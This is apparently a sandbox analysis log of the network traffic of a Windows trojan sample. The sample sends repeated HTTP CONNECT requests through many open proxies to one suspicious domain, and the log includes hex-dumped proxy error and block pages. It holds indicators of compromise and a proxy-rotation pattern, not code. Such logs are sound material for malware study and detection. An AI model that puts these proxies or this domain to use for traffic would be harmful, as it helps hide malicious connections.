                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                820192.168.2.852137204.199.129.389995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.722351074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.781316042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.786295891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.499461889 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                821192.168.2.8525918.213.137.15588885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.722362041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.014465094 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                822192.168.2.852676203.32.120.202805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.724260092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.811769962 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                823192.168.2.85180727.76.194.1310805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.757913113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                824192.168.2.85220080.65.28.57309625828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.765387058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.781286955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.786282063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.270133018 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                825192.168.2.852695104.19.120.84805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.768244028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.855637074 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                826192.168.2.852692137.184.22.9280005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.768254042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.194914103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                827192.168.2.852693172.67.105.234805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.768558025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.856230021 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                828192.168.2.852718104.25.244.70805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.772918940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.860296965 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                829192.168.2.852722203.30.191.218805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.777076006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.865044117 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                830192.168.2.85271067.43.236.20188415828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.777751923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                831192.168.2.852664178.32.141.50184725828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.794258118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.382437944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.991883993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.195017099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.382616043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.491970062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.694982052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                832192.168.2.85233354.39.50.68245355828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.810969114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                833192.168.2.852500124.163.236.5473025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.863775015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.882560015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.320327997 CET90INHTTP/1.1 200 OK
                                                                                Content-Type: application/json
                                                                                Connection: close
                                                                                Content-Length: 55


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                834192.168.2.852033103.231.78.36805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.864484072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                835192.168.2.852650185.101.16.52805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.864839077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                836192.168.2.85266995.67.79.25480805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.864851952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                837192.168.2.852790172.65.165.93300005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.889664888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                838192.168.2.852602115.74.159.3910805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.913798094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                839192.168.2.85261620.219.183.18831295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.924355030 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Feb 23, 2024 14:28:28.209028006 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                840192.168.2.852741170.106.193.128300015828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.924539089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                841192.168.2.8527155.252.23.24931285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.946825027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.724330902 CET39INHTTP/1.0 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                842192.168.2.85262420.204.214.2331295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.951461077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.236555099 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                843192.168.2.85266865.20.216.24980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.952205896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                844192.168.2.851494157.25.92.7431285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.952488899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.137017012 CET1286INHTTP/1.1 403 Forbidden
                                                                                Server: squid/3.5.28
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 1002
                                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                Content-Language: en
                                                                                X-Cache: MISS from ah_test
                                                                                Via: 1.1 ah_test (squid/3.5.28)
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 46 72 69 2c 20 32 33 20 46 65 62 20 32 30 32 34 20 31 33 3a 32 38 3a 32 38 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64
                                                                                Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://heygirlisheeverythingyouwantedinaman.com/*">https://heygirlisheeverythingyouwantedinaman.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Fri, 23 Feb 2024 13:28:28 GMT</p></d


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                845192.168.2.852677188.124.230.43176625828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.959790945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                846192.168.2.852230173.212.237.43571185828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.981261969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.991775990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.085709095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
